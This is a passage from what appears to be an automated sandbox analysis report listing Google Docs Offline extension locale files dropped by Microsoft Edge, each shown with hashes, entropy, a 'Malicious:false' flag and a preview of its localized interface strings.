                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):934
